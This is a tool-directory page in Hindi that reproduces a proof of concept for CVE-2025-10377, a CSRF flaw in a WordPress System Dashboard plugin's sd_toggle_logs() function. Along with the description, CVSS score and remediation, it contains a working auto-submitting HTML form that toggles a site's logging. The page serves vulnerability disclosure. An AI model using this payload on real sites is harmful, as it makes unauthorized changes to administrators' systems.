Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
उपकरण/GitHubGitHub/nagisayumaa/cve-2025-10377
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-10377 का प्रूफ ऑफ कॉन्सेप्ट: प्लगइन सिस्टम डैशबोर्ड में क्रॉस-साइट अनुरोध जालसाजी (CSRF) (फ़ंक्शन sd_toggle_logs)

भेद्यता प्रकार: क्रॉस-साइट अनुरोध जालसाजी (CSRF)

प्रभावित फ़ंक्शन: sd_toggle_logs()

CVSS v3.1: 4.3 (मध्यम)
वेक्टर: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(नोट: स्कोर अनधिकृत स्थिति परिवर्तन को दर्शाता है जिसके लिए एक व्यवस्थापक पीड़ित और उपयोगकर्ता इंटरैक्शन की आवश्यकता होती है।)

भेद्यता का विवरण:

sd_toggle_logs() फ़ंक्शन संवेदनशील कार्यों को संसाधित करता है जैसे पेज एक्सेस लॉग, एरर लॉग और ईमेल डिलीवरी लॉग को सक्षम/अक्षम करना। हालांकि, यह केवल $_REQUEST['log_type'] पैरामीटर और एक क्षमता जांच (current_user_can( 'manage_options' )) पर निर्भर करता है, बिना CSRF सुरक्षा (जैसे check_admin_referer() या नॉन्स) लागू किए।

परिणामस्वरूप, एक हमलावर लॉग-इन व्यवस्थापक को किसी दुर्भावनापूर्ण पृष्ठ पर जाने के लिए लुभा सकता है जो चुपचाप एक निर्मित अनुरोध सबमिट करता है, जिससे साइट लॉगिंग में अनपेक्षित सक्षम/अक्षम परिवर्तन होते हैं।

प्रभाव:

  • साइट लॉगिंग सुविधाओं के लिए अनधिकृत स्थिति परिवर्तन (पेज एक्सेस लॉग, एरर लॉग, ईमेल डिलीवरी लॉग)।

  • यदि एरर लॉगिंग सक्षम है, तो साइट एप्लिकेशन त्रुटियों को प्लगइन द्वारा निर्धारित फ़ाइल पथ पर लिखना शुरू कर सकती है (लॉग के माध्यम से परिचालन संबंधी जानकारी के प्रकट होने की संभावना बढ़ जाती है), लेकिन इस समस्या का सीधा प्रभाव स्वयं स्थिति टॉगल है।

POC

जब manage_options वाला एक लॉग-इन उपयोगकर्ता हमलावर के पृष्ठ पर जाता है, तो संबंधित लॉगिंग सुविधा स्पष्ट सहमति के बिना टॉगल हो जाती है।

 <body>
    <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
      <input type="hidden" name="log&#95;type" value="errors&#95;log" />
      <input type="hidden" name="fast&#95;ajax" value="true" />
      <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

निवारण

  • अनुरोधों को मान्य करने के लिए WordPress नॉन्स (check_admin_referer() या wp_verify_nonce()) लागू करें।

  • संवेदनशील कार्यों को केवल POST अनुरोधों तक सीमित रखें।

  • CSRF से सुरक्षा के लिए केवल क्षमता जांच पर निर्भर रहने से बचें।

वीडियो POC

यदि आप रिपोर्ट में वर्णित समस्या को ठीक वैसे ही दोहरा नहीं पा रहे हैं, तो कृपया स्पष्ट प्रजनन परिदृश्य के लिए निम्नलिखित वीडियो प्रदर्शन (PoC) देखें:

https://youtu.be/WtWYIfEM4W0

टूल डाउनलोड करें